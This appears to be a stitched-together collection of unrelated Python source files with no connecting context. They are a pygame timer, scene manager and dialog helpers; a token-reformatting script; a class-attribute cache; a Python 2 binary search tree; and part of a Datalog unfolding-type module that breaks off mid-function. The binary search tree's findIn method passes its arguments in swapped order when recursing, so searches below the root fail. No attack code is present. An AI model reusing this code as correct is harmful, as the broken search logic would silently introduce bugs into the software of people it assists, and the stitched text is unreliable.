self.nStartingSeconds = nStartingSeconds
self.stopAtZero = stopAtZero
self.nickname = nickname
self.callBack = callBack
self.running = False
self.secondsSavedRemaining = 0.0
self.reachedZero = False
def start(self, newStartingSeconds=None):
"""Start the timer running starting at nStartingSeconds (or optional different setting)"""
secondsNow = time.time()
if newStartingSeconds is not None:
self.nStartingSeconds = newStartingSeconds
self.secondsEnd = secondsNow + self.nStartingSeconds
self.reachedZero = False
self.running = True
def getTime(self):
"""Returns the remaining time as a float number of seconds"""
if not self.running:
return self.secondsSavedRemaining
self.secondsSavedRemaining = self.secondsEnd - time.time()
if self.stopAtZero and (self.secondsSavedRemaining <= 0):
self.secondsSavedRemaining = 0.0
self.running = False
self.reachedZero = True
return self.secondsSavedRemaining # returns a float
def getTimeInSeconds(self):
"""Returns the remaining time as an integer number of seconds"""
nSeconds = int(self.getTime())
return nSeconds
# Updated version using fStrings
def getTimeInHHMMSS(self, nMillisecondsDigits=0):
"""Returns the remaining time as a HH:MM:SS.mmm formatted string
Parameters:
Optional keyword parameters:
| nMillisecondsDigits - number of milliseconds digits to include (defaults to 0)
| If specified, returned string will look like: HH:MM:SS.mmm
"""
nSeconds = self.getTime()
mins, secs = divmod(nSeconds, 60)
hours, mins = divmod(int(mins), 60)
if nMillisecondsDigits > 0:
secondsWidth = nMillisecondsDigits + 3
else:
secondsWidth = 2
if hours > 0:
output = f'{hours:d}:{mins:02d}:{secs:0{secondsWidth}.{nMillisecondsDigits}f}'
elif mins > 0:
output = f'{mins:d}:{secs:0{secondsWidth}.{nMillisecondsDigits}f}'
else:
output = f'{secs:.{nMillisecondsDigits}f}'
self.savedSecondsElapsed = output
return output
def stop(self):
"""Stops the timer """
self.getTime() # remembers final self.savedSecondsElapsed
self.running = False
def ended(self):
"""Call to see if the timer has reached zero. Should be called every time through the loop"""
if self.reachedZero:
self.reachedZero = False # reset
if self.callBack is not None:
self.callBack(self.nickname)
return True
else:
return False
# To do: Would be nice to add both pause and continue methods
#
#
# Scene Manager
#
#
class SceneMgr():
"""SceneMgr (Scene Manager) allows you to build a program with multiple scenes.
The SceneMgr manages any number of scenes built as subclasses of the "Scene" class.
For more details, see the "Scene" class.
Typical use:
1) Instantiate as many Scenes as you want:
|
| oScene1 = StartingScene(window)
| oScene2 = MainScene(window)
| oScene3 = SometherScene(window)
2) Build a list of these scenes:
myScenesList = [oScene1, oScene2, oScene3]
3) Instantiate *one* SceneMgr (a singleton):
oSceneMgr = SceneMgr(myScenesList, 30) # First scene in the list is the starting scene
4) Call the run method to start the SceneMgr running:
oSceneMgr.run() # First scene in the list is the starting scene
Parameters:
| scenesList - is a list that consists of:
| [<sceneObject>, <sceneObject>, ...]
| where each sceneObject is an object instantiated from a scene class
| (For details on Scenes, see the Scene class)
| fps - is the frames per second at which the program should run
Based on the concept of a "Scene Manager" by Blake O'Hare of Nerd Paradise (nerdparadise.com)
"""
def __init__(self, scenesList, fps):
# Build a dictionary, each entry of which is a scene key : scene object
self.scenesDict = {}
for oScene in scenesList:
key = oScene.getSceneKey() # Each scene must return a unique key to identify itself
self.scenesDict[key] = oScene
# The first element in the list is the used as the starting scene
self.oCurrentScene = scenesList[0]
self.framesPerSecond = fps
# Give each scene a reference back to the SceneMgr.
# This allows any scene to do a goToScene, request, send,
# or sendAll, which gets forwarded to the scene manager.
for key, oScene in self.scenesDict.items():
oScene._setRefToSceneMgr(self)
def run(self):
""" This method implements the main pygame loop.
It should typically be called as the last line of your main program.
It is designed to call a standardized set of methods in the current scene.
All scenes must implement the following methods (polymorphism):
| handleInputs # called in every frame
| draw # called in every frame
The following methods can be implemented in a scene. If they are not
implemented, then the default version in the Scene base class will be used.
(Those methods do not do anything):
| enter # called once whenever the scene is entered
| update # called in every frame
| leave # called once whenever the scene is left
"""
clock = pygame.time.Clock()
# 6 - Loop forever
while True:
keysDownList = pygame.key.get_pressed()
# 7 - Check for and handle events
eventsList = []
for event in pygame.event.get():
if (event.type == pygame.QUIT) or \
((event.type == pygame.KEYDOWN) and
(event.key == pygame.K_ESCAPE)):
# Tell current scene we're leaving
self.oCurrentScene.leave()
pygame.quit()
sys.exit()
eventsList.append(event)
# Here, we let the current scene process all events,
# do any "per frame" actions in its update method,
# and draw everything that needs to be drawn.
self.oCurrentScene.handleInputs(eventsList, keysDownList)
self.oCurrentScene.update()
self.oCurrentScene.draw()
# 11 - Update the window
pygame.display.update()
# 12 - Slow things down a bit
clock.tick(self.framesPerSecond)
def _goToScene(self, nextSceneKey, dataForNextScene):
"""Called by a Scene, tells the SceneMgr to go to another scene
(From the Scene's point of view, it just needs to call its own goToScene method)
This method:
- Tells the current scene that it is leaving, calls leave method
- Gets any data the leaving scene wants to send to the new scene
- Tells the new scene that it is entering, calls enter method
Raises:
- KeyError if the nextSceneKey is not valid
"""
if nextSceneKey is None: # meaning, exit
pygame.quit()
sys.exit()
# Call the leave method of the old scene to allow it to clean up.
# Set the new scene (based on the key) and
# call the enter method of the new scene.
self.oCurrentScene.leave()
pygame.key.set_repeat(0) # turn off repeating characters
try:
self.oCurrentScene = self.scenesDict[nextSceneKey]
except KeyError:
raise KeyError("Trying to go to scene '" + nextSceneKey +
"' but that key is not in the dictionary of scenes.")
self.oCurrentScene.enter(dataForNextScene)
def _request_respond(self, targetSceneKey, requestID):
"""Internal method, called by a Scene tells SceneMgr to query another scene for information.
(From the Scene's point of view, it just needs to call its own request method)
The target scene must implement a method named "respond"
"""
oTargetScene = self.scenesDict[targetSceneKey]
info = oTargetScene.respond(requestID)
return info
def _send_receive(self, targetSceneKey, sendID, info):
"""Internal method, called by a Scene, tells the Scene Manager to send information to another scene
(From the sending scene's point of view, it just needs to call its own send method)
The target scene must implement a method named "receive"
"""
oTargetScene = self.scenesDict[targetSceneKey]
oTargetScene.receive(sendID, info)
def _sendAll_receive(self, oSenderScene, sendID, info):
"""Internal method, called by a Scene tells the Scene Manager to send information to all scenes (other than itself)
(From the sending scene's point of view, it just needs to call its own sendAll method)
All scenes must implement a method named "receive"
"""
for sceneKey in self.scenesDict:
oTargetScene = self.scenesDict[sceneKey]
if oTargetScene != oSenderScene:
oTargetScene.receive(sendID, info)
class Scene(ABC):
"""The Scene class is an abstract class to be used as a base class for any scenes that you want to create.
At startup, you create an instance of each of your scenes, and pass a list of these scenes objects
when you instantiate the scene manager.
In the __init__ method of your scene subclass, you will receive a window reference.
You should copy this into an instance variable like this:
| def __init__(self, window):
| self.window = window
| # Add any initialization you want to do here.
You also need to write a getSceneKey() method that returns a string
or constant that uniquely identifies the scene. It is recommended that you
build and import a Constants.py file that contains constants for each scene,
and use the key associated with the current scene here.
| def getSceneKey(self):
| return <string or CONSTANT that identifies this scene>
When your scene is active, the SceneManager calls a standard set of methods in the current scene.
Therefore, all scenes must implement these methods (polymorphism):
| handleInputs # called in every frame
| draw # called in every frame
The following methods can optionally be implemented in a scene. If they are not
implemented, then the default version in the Scene subclass will be used.
(The Scene class' default versions do not do anything, they just return):
| enter # called once whenever the scene is entered
| update # called in every frame
| leave # called once whenever the scene is left
When you want to go to a new scene:
| Call self.goToScene() and pass in the sceneKey of the scene you want to go to,
| and optionally, pass any data you want the next scene to receive in its enter() method.
If you want to quit the program from your scene, call:
| self.quit()
"""
def __del__(self):
"""Internal method, called when the scene is about to die."""
self.oSceneMgr = None # eliminate the reference to the SceneMgr
def _setRefToSceneMgr(self, oSceneMgr):
"""Internal method to save a reference to the SceneMgr object
This exists so each class built from this base class can call methods in the Scene Manager
That reference is used by the goToScene, request, and send methods in each Scene
Do not change or override this method.
"""
self.oSceneMgr = oSceneMgr
def enter(self, data):
"""This method is called whenever the user enters a scene.
Should be overridden if you expect data when your scene is entered.
Add any code you need to start or re-start the scene
Parameters:
| data - can be of any type agreed to by the old and new scenes
"""
pass
@abstractmethod
def getSceneKey(self):
"""This method must return the scene key for this scene
"""
raise NotImplementedError
@abstractmethod
def handleInputs(self, events, keyPressedList):
"""This method is called in every frame of the scene to handle events and key presses
Your code MUST override this method.
Parameters:
| events - a list of events your method should handle.
| keyPressedList - a list of keys that are pressed (a Boolean for each key).
"""
raise NotImplementedError
def update(self):
"""This method is called in every frame of the scene do any processing you need to do here"""
pass
@abstractmethod
def draw(self):
"""This method is called in every frame of the scene to draw anything that needs to be drawn
Your code must override this method.
"""
raise NotImplementedError
def leave(self):
"""This method is called whenever the user leaves a scene
Override this method, and add any code you need to clean up the scene before leaving
"""
pass
def quit(self):
"""Call this method if you want to quit, from inside a scene"""
self.goToScene(None)
def goToScene(self, nextSceneKey, data=None):
"""Call this method whenever you want to go to a new scene
Parameters:
| nextSceneKey - the scene key (string) of the scene to go to
| data - any data you want sent to the next scene (defaults to None)
| (The data can be a single value, a list, dictionary, object, etc.)
"""
self.oSceneMgr._goToScene(nextSceneKey, data)
def request(self, targetSceneKey, requestID):
"""Call this method to get information from another scene
The target scene must implement a method named: respond,
it can return any info in any way the two scenes agree upon
Parameters:
| targetSceneKey - the scene key (string) of the scene to ask for data
| requestID - the data you want from the target scene (typically a string)
"""
info = self.oSceneMgr._request_respond(targetSceneKey, requestID)
return info
def send(self, targetSceneKey, sendID, info):
"""Call this method to send information to another scene
The other scene must implement a method named: receive().
You can pass any info the two scenes agree upon
Parameters:
| targetSceneKey - the scene key (string) of the scene to ask for data
| sendID - the type of data you are sending the target scene (typically a string)
| info - the actual data to send (can be any type)
"""
self.oSceneMgr._send_receive(targetSceneKey, sendID, info)
def sendAll(self, sendID, info):
"""Call this method to send information to all other scenes
The other scenes must implement a method named: receive().
You can pass any info that the sender and all other scenes agree upon
Parameters:
| sendID - the type of data you are sending the target scene (typically a string)
| info - the actual data to send (can be any type)
"""
self.oSceneMgr._sendAll_receive(self, sendID, info) # pass in self to identify sender
def respond(self, requestID):
"""Respond to a request for information from some other scene
You must override this method if your scene expects to handle
requests for information from other scenes via calls to: request()
Parameters:
| requestID - identifier of what data to be sent back to the caller
"""
raise NotImplementedError
def receive(self, receiveID, info):
"""Receives information from another scene.
You must override this method if your scene expects to receive information from
other scenes sending information via calls to: send
Parameters:
| receiveID - an identifier for what type of information is being received
| info - the information sent from another scene
"""
raise NotImplementedError
#
# Dialog functions
#
DIALOG_BACKGROUND_COLOR = (0, 200, 200)
DIALOG_BLACK = (0, 0, 0)
def textYesNoDialog(theWindow, theRect, prompt, yesButtonText='Yes',
noButtonText='No', backgroundColor=DIALOG_BACKGROUND_COLOR,
textColor=DIALOG_BLACK):
"""A function that puts up a text-based two-button modal dialog (typically Yes/No or OK/Cancel)
It can also be used to put up a single button alert dialog (typically with an OK button)
Parameters:
| theWindow - the window to draw in
| theRect - the rectangle (or tuple) of the dialog box in the application window
| prompt - prompt (title) string to be displayed in the dialog box
Optional keyword parameters:
| yesButtonText - text on the Yes button (defaults to 'Yes')
| noButtonText - text on the No button (defaults to 'No')
| Note: If noButtonText is None, the nothing will be drawn for the No button
| This way, you can present an "alert" box with only an 'OK' button
| backgroundColor - rgb background color for the dialog box (defaults to (0, 200, 200))
| textColor - rgb color for the prompt text (defaults to black)
Returns:
| True - meaning the Yes button was pressed
| or
| False - meaning the No button was pressed
|
| (With an alert dialog, you can ignore the returned value, as it will always be True.)
"""
dialogLeft = theRect[0]
dialogTop = theRect[1]
dialogWidth = theRect[2]
dialogHeight = theRect[3]
frameRect = pygame.Rect(dialogLeft + 1, dialogTop + 1, dialogWidth - 2, dialogHeight - 2)
INSET = 30 # inset buttons from the edges of the dialog box
promptText = pygwidgets.DisplayText(theWindow, (dialogLeft, dialogTop + 30), prompt,
fontSize=24, width=dialogWidth, justified='center', textColor=textColor)
# Create buttons, fix locations after finding out the size of the button(s)
showNoButton = not (noButtonText is None)
if showNoButton:
noButton = pygwidgets.TextButton(theWindow, (0, 0), noButtonText)
yesButton = pygwidgets.TextButton(theWindow, (0, 0), yesButtonText)
yesButtonRect = yesButton.getRect()
yesButtonHeight = yesButtonRect[3]
yesButtonWidth = yesButtonRect[2] # get width
xPos = dialogLeft + dialogWidth - yesButtonWidth - INSET
buttonsY = dialogTop + dialogHeight - yesButtonHeight - 20
if showNoButton:
noButton.setLoc((dialogLeft + INSET, buttonsY))
yesButton.setLoc((xPos, buttonsY))
#print('In dialogYesNo')
#print('theRect is', theRect)
#print('frameRect is', frameRect)
# 6 - Loop forever
while True:
# 7 - Check for and handle events
for event in pygame.event.get():
if (event.type == QUIT) or \
((event.type == KEYDOWN) and (event.key == K_ESCAPE)):
pygame.quit()
sys.exit()
if showNoButton:
if noButton.handleEvent(event):
return False
if yesButton.handleEvent(event):
return True
# 8 - Do any "per frame" actions
# 9 - Clear the window area before drawing it again
pygame.draw.rect(theWindow, backgroundColor, theRect)
pygame.draw.rect(theWindow, DIALOG_BLACK, frameRect, 1)
# 10 - Draw the window elements
promptText.draw()
if showNoButton:
noButton.draw()
yesButton.draw()
# 11 - Update the window
pygame.display.update()
# 12 - Slow things down a bit
#clock.tick(FRAMES_PER_SECOND) # no need for this
def customYesNoDialog(theWindow, oDialogImage, oPromptText, oYesButton, oNoButton):
"""A function that puts up a custom two-button modal dialog (typically Yes/No or OK/Cancel)
It can also be used to put up a single button alert dialog (with a typcial OK button)
Parameters:
| theWindow - the window to draw in
| oDialogImage - an Image object (from pygwidgets) with the background of the dialog box
| oPromptText - a TextDisplay object (from pygwidgets) containing the prompt to display
| oYesButton - a CustomButton object (from pygwidgets) representing Yes or OK, etc.
| oNoButton - a CustomButton object (from pygwidgets) representing No or Cancel, etc.
| Note: If oNoButton is None, the No button will not be drawn
| This way, you can present an "alert" box with only a single button, like 'OK'
Returns:
| True - meaning the Yes button was pressed
| or
| False - meaning the No button was pressed
|
| (With an alert dialog, you can ignore the returned value, as it will always be True.)
"""
showNoButton = not (oNoButton is None)
# 6 - Loop forever
while True:
# 7 - Check for and handle events
for event in pygame.event.get():
if (event.type == QUIT) or \
((event.type == KEYDOWN) and (event.key == K_ESCAPE)):
pygame.quit()
sys.exit()
if showNoButton:
if oNoButton.handleEvent(event):
return False
if oYesButton.handleEvent(event):
return True
# 8 - Do any "per frame" actions
# 9 - Clear the window area before drawing it again
# 10 - Draw the window elements
oDialogImage.draw()
oPromptText.draw()
if showNoButton:
oNoButton.draw()
oYesButton.draw()
# 11 - Update the window
pygame.display.update()
# 12 - Slow things down a bit
#clock.tick(FRAMES_PER_SECOND) # no need for this
def textAnswerDialog(theWindow, theRect, prompt, okButtonText='OK',
cancelButtonText='Cancel', backgroundColor=DIALOG_BACKGROUND_COLOR,
promptTextColor=DIALOG_BLACK, inputTextColor=DIALOG_BLACK):
"""A function that puts up a text-based two-button answerable modal dialog (typically OK/Cancel)
Parameters:
| theWindow - the window to draw in
| theRect - the rectangle (or tuple) of the dialog box in the application window
| prompt - prompt (title) string to be displayed in the dialog box
Optional keyword parameters:
| okButtonText - text on the OK button (defaults to 'OK')
| cancelButtonText - text on the Cancel button (defaults to 'Cancel')
| backgroundColor - rgb background color for the dialog box (defaults to (0, 200, 200))
| promptTextColor - rgb color of the prompt text (defaults to black)
| inputTextColor - rgb color of the input text (defaults to black)
Returns:
| userAnswer - If user presses OK, returns the text the user typed. Otherwise returns None
"""
dialogLeft = theRect[0]
dialogTop = theRect[1]
dialogWidth = theRect[2]
dialogHeight = theRect[3]
INSET = 30 # inset buttons from the edges of the dialog box
promptText = pygwidgets.DisplayText(theWindow, (dialogLeft, dialogTop + 30), prompt,
fontSize=24, width=dialogWidth, justified='center',
textColor=promptTextColor)
inputWidth = dialogWidth - (2 * INSET)
inputText = pygwidgets.InputText(theWindow, (dialogLeft + INSET, dialogTop + 80),
width=inputWidth, initialFocus=True, textColor=inputTextColor)
cancelButton = pygwidgets.TextButton(theWindow, (0, 0), cancelButtonText)
okButton = pygwidgets.TextButton(theWindow, (0, 0), okButtonText)
okButtonRect = okButton.getRect()
okButtonHeight = okButtonRect[3]
okButtonWidth = okButtonRect[2] # get width
xPos = dialogLeft + dialogWidth - okButtonWidth - INSET
buttonsY = dialogTop + dialogHeight - okButtonHeight - 20
cancelButton.setLoc((dialogLeft + INSET, buttonsY))
okButton.setLoc((xPos, buttonsY))
# 6 - Loop forever
while True:
# 7 - Check for and handle events
for event in pygame.event.get():
if (event.type == QUIT) or \
((event.type == KEYDOWN) and (event.key == K_ESCAPE)):
pygame.quit()
sys.exit()
if inputText.handleEvent(event) or okButton.handleEvent(event):
theAnswer = inputText.getValue()
return theAnswer
if cancelButton.handleEvent(event):
return None
# 8 - Do any "per frame" actions
# 9 - Clear the window area before drawing it again
pygame.draw.rect(theWindow, backgroundColor, theRect)
pygame.draw.rect(theWindow, DIALOG_BLACK, theRect, 1)
# 10 - Draw the window elements
promptText.draw()
inputText.draw()
cancelButton.draw()
okButton.draw()
# 11 - Update the window
pygame.display.update()
# 12 - Slow things down a bit
#clock.tick(FRAMES_PER_SECOND) # no need for this
def customAnswerDialog(theWindow, oDialogImage, oPromptText, oAnswerText, oOKButton, oCancelButton):
"""A function that puts up a custom two-button modal dialog (typically Yes/No or OK/Cancel)
Parameters:
| theWindow - the window to draw in
| oDialogImage - an Image object (from pygwidgets) containing the background of the dialog box
| oPromptText - a TextDisplay object (from pygwidgets) containing the prompt to display
| oAnswerText - an InputText object (from pygwidgets) where the user types their answer
| oOKButton - a CustomButton object (from pygwidgets) representing OK, etc.
| oCancelButton - a CustomButton object (from pygwidgets) representing Cancel, etc.
Returns:
| userAnswer - If user presse OK, returns the text the user typed. Otherwise returns None
"""
# 6 - Loop forever
while True:
# 7 - Check for and handle events
for event in pygame.event.get():
if (event.type == QUIT) or \
((event.type == KEYDOWN) and (event.key == K_ESCAPE)):
pygame.quit()
sys.exit()
if oAnswerText.handleEvent(event) or oOKButton.handleEvent(event):
userResponse = oAnswerText.getValue()
return userResponse
if oCancelButton.handleEvent(event):
return None
# 8 - Do any "per frame" actions
# 9 - Clear the window area before drawing it again
# 10 - Draw the window elements
oDialogImage.draw()
oAnswerText.draw()
oPromptText.draw()
oCancelButton.draw()
oOKButton.draw()
# 11 - Update the window
pygame.display.update()
# 12 - Slow things down a bit
#clock.tick(FRAMES_PER_SECOND) # no need for this
|
def combine_type(input_file, output_file):
for line in input_file:
str2 = line.split("▁SEP")
str1 = str2[1:-1]
type_arr = []
name_arr = []
for k in str1:
print(k)
ent_type = k.split("▁FILL")[0]
name = k.split("▁FILL")[1]
ent_type = ent_type.replace(" ", "").replace("▁", "")
type_arr.append(ent_type)
name_arr.append(name)
final_str = str2[0]
for k in range(len(type_arr)):
final_str = final_str + "▁SEP " + type_arr[k] + " ▁FILL" + name_arr[k]
final_str = final_str + "▁SEP"
final_str = final_str + str2[-1]
output_file.write(final_str)
combine_type(open("data/train/text", "r"), open("data/train/text_new", "w"))
combine_type(open("data/devel/text", "r"), open("data/devel/text_new", "w"))
combine_type(open("data/test/text", "r"), open("data/test/text_new", "w"))
|
from . import tools
class ClassIsSomething(object):
"""Method to test whether a class exhibits a given attribute.
The idea here is that the class is expected to be immutable, so whether
or not it exhibits the desired attribute is something we can cache. For
example, a class will remain iterable, and looking up whether a given
object's class is in the set of classes known to be iterable is much
faster than using a function that checks whether it is iterable.
"""
def __init__(self, check_method):
self.check_method = check_method
self._true_set = set()
self._false_set = set()
def force_true(self, cls):
self._false_set.discard(cls)
self._true_set.add(cls)
def force_false(self, cls):
self._true_set.discard(cls)
self._false_set.add(cls)
def __call__(self, obj):
key = obj.__class__
if key in self._false_set:
result = False
elif key in self._true_set:
result = True
else:
result = self.check_method(obj)
set_for_obj = {True: self._true_set,
False: self._false_set}[result]
set_for_obj.add(key)
return result
def _is_iterable_method(obj):
return tools.is_iterable(obj) and not tools.is_numpy_iterable(obj)
is_storage_iterable = ClassIsSomething(_is_iterable_method)
is_storage_mappable = ClassIsSomething(tools.is_mappable)
|
#!/usr/bin/env python
#
# A binary search tree.
class BST:
class Node:
left, right, key = None, None, 0
def __init__(self, key):
self.left = None
self.right = None
self.key = key
def __init__(self):
self.root = None
def insert(self, key):
if not self.root:
self.root = BST.Node(key)
return True
return self.insertInto(key, self.root)
def insertInto(self, key, node):
if key == node.key:
return False
if key < node.key:
if node.left:
return self.insertInto(key, node.left)
else:
node.left = BST.Node(key)
return True
else:
if node.right:
return self.insertInto(key, node.right)
else:
node.right = BST.Node(key)
return True
def find(self, key):
return self.findIn(key, self.root)
def findIn(self, key, node):
if not node:
return False
if key == node.key:
return True
if key < node.key:
return self.findIn(node.left, key)
else:
return self.findIn(node.right, key)
def minKey(self):
if not self.root:
return None
node = self.root
while (node.left):
node = node.left
return node.key
def maxKey(self):
if not self.root:
return None
node = self.root
while (node.right):
node = node.right
return node.key
def depth(self):
return self.depthIn(self.root)
def depthIn(self, node):
if not node:
return 0
leftDepth = self.depthIn(node.left)
rightDepth = self.depthIn(node.right)
return max(leftDepth, rightDepth) + 1
def size(self):
return self.sizeIn(self.root)
def sizeIn(self, node):
if not node:
return 0
return 1 + self.sizeIn(node.left) + self.sizeIn(node.right)
def visitInorder(self, f):
self.visitInorderSubtree(f, self.root)
def visitInorderSubtree(self, f, node):
if not node:
return
self.visitInorderSubtree(f, node.left)
f(node.key)
self.visitInorderSubtree(f, node.right)
def printKey(key):
print key,
def usage():
print "Usage: bst <numkeys>"
if __name__ == "__main__":
import sys, lfsr
if len(sys.argv) != 2:
usage()
sys.exit(1)
bst = BST()
lfsr = lfsr.LFSR()
for i in range(0,int(sys.argv[1])):
bst.insert(lfsr.randInt())
print "Size:", bst.size()
print "Depth:", bst.depth()
print "Range:", bst.minKey(), "-", bst.maxKey()
print "Values:",
bst.visitInorder(printKey)
|
# -*- coding: utf-8 -*-
# Copyright 2018 Orange
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import itertools
import six
from octant.common import ast
class UFType(object):
"""Base class for unfolding types"""
pass
class UFBot(UFType):
"""Bottom type corresponds to no information at all"""
def __eq__(self, other):
return isinstance(other, self.__class__)
def __hash__(self):
return 1
def __repr__(self):
return "UFBot"
class UFTop(UFType):
"""Top type means any value"""
def __eq__(self, other):
return isinstance(other, self.__class__)
def __hash__(self):
return 2
def __repr__(self):
return "UFTop"
class UFGround(UFType):
"""Coerced to be a ground value of parameter at a given position
.. py:attribute:: pos:
position of the argument in the table (integer starting at 0)
.. py:attribute:: table:
table of the EDB defining the ground term (str)
.. py:attribute:: occurrence:
An occurrence list defining in a unique way the instance
of the ground term in use. (linked list represented as pair or None.
Elements are pairs of a rule identifier (int) and a position of the
atom in the body (int))
"""
def __init__(self, pos, table, occurrence):
self.pos = pos
self.table = table
self.occurrence = occurrence
def __eq__(self, other):
return (
isinstance(other, self.__class__) and other.pos == self.pos and
other.table == self.table and other.occurrence == self.occurrence)
def __hash__(self):
return hash((self.pos, self.table, self.occurrence))
def __repr__(self):
return "UFGround(%s,%d,%s)" % (self.table, self.pos, self.occurrence)
class UFConj(UFType):
"""Conjunctions of types
It represent a conjunct of constraints on the origin. It is usually
simplified at some point as one of the origins.
"""
def __init__(self, args):
#: the members of the conjunct: args. It must be a tuple
self.args = args
def __eq__(self, other):
return isinstance(other, self.__class__) and other.args == self.args
def __hash__(self):
return hash(self.args)
def __repr__(self):
return "UFConj%s" % (self.args,)
class UFDisj(UFType):
"""Disjunctions of types
The values of the element may come from either origins.
"""
def __init__(self, args):
#: the members of the disjunct: args. It must be a tuple
self.args = args
def __eq__(self, other):
return isinstance(other, self.__class__) and other.args == self.args
def __hash__(self):
return hash(self.args)
def __repr__(self):
return "UFDisj%s" % (self.args,)
class GroundHead(collections.namedtuple("GroundHead", ["table", "rid"])):
def __str__(self):
return self.table + "_(" + str(self.rid) + ")"
top = UFTop()
bot = UFBot()
def is_ground(t):
"""Return true is object is a ground object
:param UFType t: type to check
:return: true if ground false otehrwise
:rtype: bool
"""
return isinstance(t, UFGround)
def is_disj(t):
"""Return true is object is a disjonction
:param UFType t: type to check
:return: true if disjonction false otehrwise
:rtype: bool
"""
return isinstance(t, UFDisj)
def occurrence(t):
"""Computes an occurrence for the whole types
Occcurrence shouldbe seen as unique ID
:param UFType t: type to analyze
:return: all the occurrences
:rtype: tuple
"""
if is_ground(t):
return t.occurrence
if is_disj(t):
return tuple(occurrence(a) for a in t.args)
return None
def simplify_to_ground_types(t):
"""Gives back simple ground or disjunction"""
if is_ground(t):
return [t]
if is_disj(t):
expand_args = map(simplify_to_ground_types, t.args)
prod_args = itertools.product(*expand_args)
return map(UFDisj, prod_args)
if isinstance(t, UFConj):
return [g for a in t.args for g in simplify_to_ground_types(a)]
return []
def contains_mark(occ, mark):
if isinstance(occ, tuple) and len(occ) == 2:
if mark == occ[0]:
return True
return contains_mark(occ[1], mark)
return False
def len_occ(occ):
"""Compute length of the occurrence pseudo list
We use pairs and not regular lists because we want a hashable
non mutable element.
"""
count = 0
while isinstance(occ, tuple) and len(occ) == 2:
count = count + 1
occ = occ[1]
return count
def weight_type(t):
"""Weight function for types.
To use in sorting but also min/max.
The smaller, the better. Returns a pair for lexicographic ordering.
"""
if is_ground(t):
return 0, len_occ(t.occurrence)
if isinstance(t, (UFDisj, UFConj)):
return 1, len(t.args)
else:
return 2, 0
def wrap_type(typ, mark):
"""Identifies the provenance of type as a given atom
:param type: the type to wrap
:param mark: mark to add. usually the identifier of rule containing the
atom occurrence and the position of this atom in the body of the rule
:return: modified type
"""
if is_ground(typ):
if contains_mark(typ.occurrence, mark):
return typ
return UFGround(typ.pos, typ.table, (mark, typ.occurrence))
if is_disj(typ):
return UFDisj(tuple(wrap_type(t, mark) for t in typ.args))
if isinstance(typ, UFConj):
return UFConj(tuple(wrap_type(t, mark) for t in typ.args))
return typ
def head_table(rule):
"""Table name of the head of a rule"""
return rule.head.table
def reduce_disj(l):
"""Disjunction simplification
First it removes embedded disjunction.
"""
flat = {
x
for e in l
for x in (e.args if is_disj(e) else (e,))}
if len(flat) == 1:
return flat.pop()
if top in flat:
return top
return UFDisj(tuple(flat))
def reduce_conj(l):
"""Conjunct simplification
First it removes embedded conjunctions.
If there is at least one ground type in the conjunct, keep all those ground
types. Otherwise only keep the best of the conjunct and throw away the
others.
:param l: the list of types that could build the conjunct. It
must be sorted.
:return: a conjunct with more than one type or what was considered as the
best type
:rtype: UFType
"""
flatset = {
x
for e in l
for x in (e.args if isinstance(e, UFConj) else (e,))}
flat = sorted(flatset, key=weight_type)
if len(flat) > 1 and is_ground(flat[0]):
flat = tuple(filter(is_ground, flat))
if len(flat) > 1:
return UFConj(tuple(flat))
return flat[0]
class Origin(object):
"""Origin computes types for unfolding."""
def __init__(self, rules, extensible_tables):
"""Unfolding constructor
:param rules: A list of rules as AST with unique variables and
primitive tables with labels solved.
:param extensible_tables: A mapping from table names to a pair of
boolean and number specifying if the table is extentional and
the arity of the table.
:param compiler: a compiler of constants to Z3
"""
self.rules = rules
self.rules.sort(key=head_table)
self.tables = {}
self.grounds = {}
self.table_types = {}
self.var_types = {}
self.populate_tables(extensible_tables)
def populate_tables(self, extensible_tables):
"""Initialize tables field
It is a map from table name to their arity and the fact they are
in the IDB or the EDB
"""
for table, args in six.iteritems(extensible_tables):
self.tables[table] = (len(args), True)
for table, group_rule in itertools.groupby(self.rules, key=head_table):
self.tables[table] = (len(list(group_rule)[0].head.args), False)
def get_partially_ground_preds(self):
"""Gives back a map of the ground arguments of a table
An intentional table is ground at argument i, if in all rules
defining it, the ith argument in the head is ground.
:return: a dictionary mapping each table name to the set of argument
positions (integers) that are ground for this table.
"""
return {
table: set.intersection(
*({i
for i, term in enumerate(r.head.args)
if not (isinstance(term, ast.Variable))}
for r in group_rule))
for table, group_rule in itertools.groupby(self.rules,
key=head_table)}
def initialize_types(self):
"""initialize table_types
The type is either bottom or Ground: arguments are the position of the
argument, the name of the table and an empty context.
"""
ground_info = self.get_partially_ground_preds()
def initialize_table(tname, is_ext, arity):
grounds = ground_info[tname]
return [
UFGround(i, tname, None) if i in grounds else UFBot()
for i in range(arity)]
self.table_types = {
tname: initialize_table(tname, is_ext, arity)
for (tname, (arity, is_ext)) in six.iteritems(self.tables)
if not is_ext}
def get_atom_type(self, atom, i):
"""Computes the type of argument at position i of an atom atom
:param ast.Atom atom: the atom to type
:param int i: the position
:return: a type or None if not typable.
"""
table = atom.table
# This is a primitive
if table not in self.tables:
return None
# This is an extensible predicate: ground
if self.tables[table][1]:
return UFGround(i, table, None)
# This is an intentional one: get the previous approximation
if table in self.table_types:
typ = self.table_types[table]
return typ[i] if i < len(typ) else None
return None
def type_variables(self):
"""Builds a variables type from table types.
Several types may be found for each variables as they are constrained
by multiple tables.
var_types is updated with a map from variable full ids to types.
"""
constraints = [
(arg.full_id(), wrap_type(typ_arg, (rule.id, j)))
for rule in self.rules # iterate over rules
for (j, atom) in enumerate(rule.body) # iterate over body atoms
for (i, arg) in enumerate(atom.args) # iterate over args
if isinstance(arg, ast.Variable) # that are variables
# This is a let: get the type of the ith argument of table.
for typ_arg in (self.get_atom_type(atom, i),)
# discard it if we did not find it.
if typ_arg is not None
]
constraints.sort(key=lambda p: p[0])
self.var_types = {
# The true type would be a conjunction. But we do not want to
# make the type unduly complex and we just keep the "Best"
# value restriction proposed so far.
# If we had the size of the constants pools, we could do a better
# informed choice.
id: reduce_conj([t for _, t in g])
for id, g in itertools.groupby(constraints, lambda p: p[0])}
def type_tables(self):
"""Builds table types from variable types
Table types are the conjunction of the types found for each rule.
:returns: next value of table types.
:rtype: map from string to array of type.
"""
def type_arg_at(arg, table, i, id):
